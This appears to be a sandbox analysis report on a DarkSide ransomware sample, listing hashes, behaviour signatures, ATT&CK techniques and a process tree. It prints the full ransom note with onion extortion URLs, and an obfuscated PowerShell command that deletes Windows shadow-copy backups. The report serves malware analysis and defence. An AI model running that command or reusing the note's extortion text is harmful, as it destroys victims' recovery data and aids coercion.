Overview

overview

10

Static

static

1.exe

windows7_x64

10

1.exe

windows10_x64

10

Analysis

  • max time kernel
    97s
  • max time network
    99s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    11-05-2021 04:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1.exe

  • Size

    41KB

  • MD5

    a14e07f7da701bd91108f988862a71a0

  • SHA1

    bcbe67c6518e68d4056f10fe9191d2900d06190f

  • SHA256

    bc32a2ccf158ebe2b76646be865a4c6dd91da6b8e5bb0dd9520102a9bfea5439

  • SHA512

    06df2cd0ff26e8452cf139751f498db63d04a85f59a6ccf2e308c8c830fdd15c2dcdee9697e61a22da58c932e6f9440a134f1e6fff3d42d87f0ce97bf4a85442

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.efaa031a.TXT

Family

darkside

Ransom Note
----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Modifies extensions of user files
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1612
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:636

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1
T1081

Discovery

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    7ec36b60a53214762d5db00dc3fc6688

    SHA1

    bbc9b66763a203adcf4fa703b8acf6e7518f0675

    SHA256

    6821512af5e48dd3379731ddd4eea396c23b114194a2129118b25224b0d45091

    SHA512

    c7fa5995b6236d716cdaeaa3733dee0259854329fc35738e4e4176ee16bb2e222d25ce644a705755c95c73bed250736b2eb550cc8cf00187c7dcf59651ae7183

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    60f82d899c5d7a8dc3eb04fbf485bfe7

    SHA1

    16b1f8274eaa2f6c33646917ecd1edda0db58f4d

    SHA256

    265085e41f844ba81b6896c47b861061027d4b4f1be2fc22cbebeb52954cff03

    SHA512

    0e640f555b35350c9d9771e00e61ca530671e766eceb2802af0ce5f813c200a952d686fd8118c3505bd08068e222f572014991254408eb8e5f4471d2117d0e23

    Download Submit
  • memory/340-59-0x00000000750C1000-0x00000000750C3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1612-66-0x000000001AC34000-0x000000001AC36000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1612-63-0x000000001ACB0000-0x000000001ACB1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1612-64-0x0000000002070000-0x0000000002071000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1612-62-0x0000000001DC0000-0x0000000001DC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1612-65-0x000000001AC30000-0x000000001AC32000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1612-67-0x00000000024F0000-0x00000000024F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1612-68-0x000000001C3C0000-0x000000001C3C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1612-69-0x000000001C580000-0x000000001C581000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1612-61-0x000007FEFB701000-0x000007FEFB703000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1612-60-0x0000000000000000-mapping.dmp
    Download